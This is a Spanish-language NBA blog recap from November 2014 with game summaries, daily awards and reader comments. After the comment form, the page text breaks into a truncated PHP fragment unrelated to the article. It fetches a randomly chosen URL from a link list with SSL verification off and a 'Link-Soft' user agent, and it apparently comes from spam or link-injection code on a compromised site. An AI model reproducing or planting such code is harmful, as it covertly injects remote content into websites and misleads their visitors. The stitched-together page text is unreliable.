La crónica: Todos los jugones sonríen igual

26 de November de 2014 por FranGuaita

Steph Curry firma su mejor registro anotador de la temporada. 40 puntazos y 8 triples para congelar el AAA de Miami. Golden State quiere reinar. Además, siguen los problemas físicos de Derrick Rose: sólo pudo jugar 9 minutos en Denver. Batalla titánica de interiores en New Orleans. Cousins anuló el efecto de La Ceja para el asalto de Sacramento al Smoothie King Center. We love this game.

Pasen y lean.

curry_heat

HEAT 97 – WARRIORS 114

Cuando los Splash Brothers tienen la noche y ven el aro como una piscina olímpica, es mejor aceptar la realidad y guardar fuerzas para el siguiente partido. Exactamente eso le ha ocurrido esta madrugada a Miami Heat, que siguen sin poder disponer de Dwyane Wade. Definitivamente, Golden State ha adquirido velocidad de crucero y gana enteros como alternativa de poder en el salvaje Oeste. Para el asalto al American Airlines Arena han recurrido a su clásico run and gun delante -57% en tiros de campo, palabras mayores. Pero, lo que quizá sea más importante para Steve Kerr, el trabajo defensivo del último cuarto ha sido sencillamente impecable. Miami no ha podido pasar de los 11 puntos. En la canasta contraria, los Warriors funcionaban como un reloj suizo. 14 puntos consecutivos en la recta final y sentencia definitiva a falta de tres minutos (95-107). En este instante, Steph Curry sonreía hacia su banquillo con una mirada cómplice. Todos los jugones sonríen igual. Vaya noche del killer con cara de estudiante de secundaria: 40 puntos, 6 rebotes, 7 asistencias y una serie de 8/11 en tiros de tres. Los Warriors han llegado para quedarse.

Quienes aun no lo hayan visto… disfruten:

NUGGETS 114 – BULLS 109

Pese a las ausencias de Joakim Noah, Taj Gibson y la penúltima edición del calvario de lesiones de Derrick Rose (únicamente pudo disputar nueve minutos de partido), el Pepsi Center tuvo que contener la respiración prácticamente hasta el bocinazo definitivo. Una suspensión tras paso atrás de Ty Lawson ante la defensa de Hinrich firmó la sentencia de Chicao, que se mantuvo con opciones pese al eléctrico tercer cuarto de Ty Lawson (13 puntos en ese periodo). El playmaker de North Carolina no encontró oposición en su batalla individual con Brooks, primero, y Hinrich después. Pau Gasol mantuvo el tipo en la pintura (22 puntos y 12 rebotes), acompañado únicamente por el rookie australiano Cameron Bairstow. Escaso poderío interior ante la consistencia de Manimal y Timo. Ambos flirtearon con el doble doble y dotaron de segundas opciones a la franquicia dirigida por Brian Shaw, que equilibra su registro de victorias y derrotas (7-7). Que todo no sea negativo en Chicago. Recital de Jimmy Butler: 32 puntos y 9 rebotes. Respect.

PELICANS 89 – KINGS 99

DeMarcus Cousins no entiende de jerarquías ni se amilana ante amenazas interiores como la del poderoso influjo de la ceja. Sólo así se entiende su titánico partido en la guarida de Anthony Davis, que anoche, enfermo, fue menos fiero. Sacramento obtuvo una de esas victorias que suponen un evidente salto cualitativo para cualquier franquicia que sueñe con seguir jugando tras el paso del Rubicón en el mes de mayo. El díscolo center nacido en Alabama quiso enviar un mensaje tras ser elegido jugador de la semana hace unas horas: “Voy a seguir jugando como si cada partido fuera el último. Sigo con hambre”. Cousins firmó una hoja de servicios con 22 puntos, 12 rebotes y 3 robos. Un recital para el que New Orleans nunca tuvo respuesta. En la recta final de partido, y con los Pelicans aproximándose de forma inquietante, DeMarcus encontró el socio perfecto. Omri Casspi (22 puntos con una serie de 9/14 en tiros de campos) enchufó una suspensión con rectificado punteada por Davis y culminó un contragolpe tras robo a Tyreke Evans para silenciar al Smoothie King Center.

BUCKS 98 – PISTONS 86

Otra noche en la oficina para Brandon Knight. El base formado en la Universidad de Kentucky sigue con su particular Noviembre Dulce. En sus últimos diez partidos ha firmado dobles figuras, cohabitando además con la frontera del 50% en tiros de campo. Esta madrugada se ha marchado hasta los 20 puntos y 8 asistencias, liderando a Milwaukee para un cómodo triunfo en el BMO Harris Bradley Center ante Detroit. Andre Drummond (23 puntos y 10 rebotes), MVP de la noche para la franquicia de la Motown que sigue sin levantar cabeza (3-11).

WIZARDS 102 – HAWKS 106

La segunda unidad de Atanta decidió la batalla entre dos serios aspirantes a estar en playoffs de la conferencia Este. Mike Scott y Shelvin Mack se combinaron para 30 puntos desde el banquillo, 20 de ellos en el último cuarto. Durante la primera mitad, Jeff Teague (28 puntos) y Paul Millsap (17 puntos y 11 rebotes) llevaron el peso de las operaciones. John Wall firmó un doble doble (21 puntos y 13 asistencias), pero no pudo guiar a Washington hasta su décima victoria en temporada regular. Nené, aquejado de una fascitis plantar, tuvo que verlo con el traje de calle. Kris Humpries ocupó su lugar en el cinco inicial de Randy Wittman.

PREMIOS

MVP: Hoy no hay candidatos, no hay premio compartido, no hay podium… hoy solo hay Stephen Curry. Su bagaje anoche en Miami, poca cosa: 40 puntos, con 12 de 19 en tiros de campo (incluyendo 8 de 11 en triples), 6 rebotes, 7 asistencias, 3 robos, 1 tapón y una sonrisa de jugón que no se la aguanta.

Rookie: No estuvieron mal los rookies de Miami Ennis & Napier, que sumaron 18-11-6, pero el premio es para Jabari Parker, autor de 14 puntos, 9 rebotes, 2 asistencias, 1 robo y 1 tapón.

Sorpresa: Omri Casspi suplió a Rudy Gay con una actuación excelente y clave en la victoria de los Kings. El israelí firmó 22 puntos (9 de 14 tiros), 4 rebotes, 1 asistencia y 1 robo.

Decepción: Somos muy fans de Giannis Antetokounmpo, por eso nos decepcionó especialmente su 1 de 13 en tiros para solo 2 puntos ante los Pistons.

Mayor esfuerzo en vano: Hubo varias actuaciones notables entre los perdedores, como los 26-9 de Bosh, los 21-13 de Wall o la pareja Tyreke & Ryan Anderson (22-7-5 y 20-5). El premio,  sin embargo, es para Jimmy Butler y sus 32 puntos y 9 rebotes.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. iker dice:
    #1

    thibs ha dicho que simplemente le dio descanso ya que se trataba de un back to back, no esta lesionado, no mintáis.

      Citar

  2. Txusma dice:
    #2

    iker:
    thibs ha dicho que simplemente le dio descanso ya que se trataba de un back to back, no esta lesionado, no mintáis.

    Artículo en el Chicago Tribune: http://www.chicagotribune.com/sports/basketball/bulls/ct-derrick-rose-report-bulls-jazz-spt-1126-20141125-story.html

    Cita:
    “… Then the team announced before the third quarter that Derrick Rose would sit out the second half because of left hamstring tightness. He had missed four games because of that before playing Monday night.”

    En ningún momento la Crónica habla de recaida o nuevas lesiones simplemente comenta que lo de ayer es un nuevo capítulo dentro del calvario de lesiones de Rose. Creo que mentiras, ninguna.

      Citar

  3. Ruxixon dice:
    #3

    Cambiarme los pronósticos de Milwaukee y Detroit en sus respectivos análisis porfa.Gracias xDD

    PD.ponga un Casspi en su equipo,vaya carácter tiene este tio,da gusto contar con alguien así

      Citar

  4. txusma dice:
    #4

    La pareja Giannis – Jabari pinta a mítica.

      Citar

  5. iker dice:
    #5

    Txusma: Artículo en el Chicago Tribune: http://www.chicagotribune.com/sports/basketball/bulls/ct-derrick-rose-report-bulls-jazz-spt-1126-20141125-story.html

    Cita:
    Coach Tom Thibodeau said Rose did not reinjure the hamstring and he kept him out for precautionary reasons.

    “I didn’t want to take a chance,” Thibodeau said.
    “… Then the team announced before the third quarter that Derrick Rose would sit out the second half because of left hamstring tightness. He had missed four games because of that before playing Monday night.”

    En ningún momento la Crónica habla de recaida o nuevas lesiones simplemente comenta que lo de ayer es un nuevo capítulo dentro del calvario de lesiones de Rose. Creo que mentiras, ninguna.

      Citar

  6. Nacho dice:
    #6

    Pues parece que cada vez que hablo cambio el devenir de las franquicias aludidas. Hace diez días me tragué (literalmente, porque fue infumable) el Denver- New York que dejaba a los de Colorado con un balance de 2-7, a Shaw con un pie fuera, y supongo que a los propietarios con ganas de patear a todos los jugadores. Porque se podía perder, ir mal y todo eso, pero no con esa imagen.
    Comenté aquí algo de esa necedad de equipo, y en estos diez días se despachan con cinco victorias consecutivas, Cav´s y Bulls son los primeros y últimos en caer y entre medias cortan la rachilla de Lakers, depilan la ceja y ganan a los pobres OKC.
    Supongo que en Denver esperaban estar más arriba a estas alturas, pero el cambio de tendencia parece que hará que el bueno de Brian se coma los turrones contemplando las Rocosas.

    Ahora iba a hablar bien de los Blazers, pero no creo que el bueno de LaMarcus y sus chicos merezcan el gafe.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>